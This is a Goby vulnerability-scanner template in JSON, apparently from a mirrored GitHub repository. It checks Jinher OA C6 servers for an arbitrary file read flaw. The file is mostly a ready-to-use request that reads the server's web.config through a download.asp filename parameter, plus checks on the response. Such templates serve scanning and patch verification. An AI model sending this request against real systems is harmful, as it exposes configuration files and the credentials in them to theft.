mirror of https://github.com/qwqdanchun/Goby.git
51 lines
1.9 KiB
JSON
51 lines
1.9 KiB
JSON
{
|
||
"Name": "金和OA C6 download.jsp 任意文件读取漏洞",
|
||
"Level": "3",
|
||
"Tags": [],
|
||
"GobyQuery": "app=\"Jinher-OA\"",
|
||
"Description": "金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息",
|
||
"Product": "",
|
||
"Homepage": "https://gobies.org/",
|
||
"Author": "gobysec@gmail.com",
|
||
"Impact": "",
|
||
"Recommandation": "",
|
||
"References": [
|
||
"https://gobies.org/"
|
||
],
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "xml",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"PostTime": "2021-06-12 11:18:49",
|
||
"GobyVersion": "1.8.268"
|
||
} |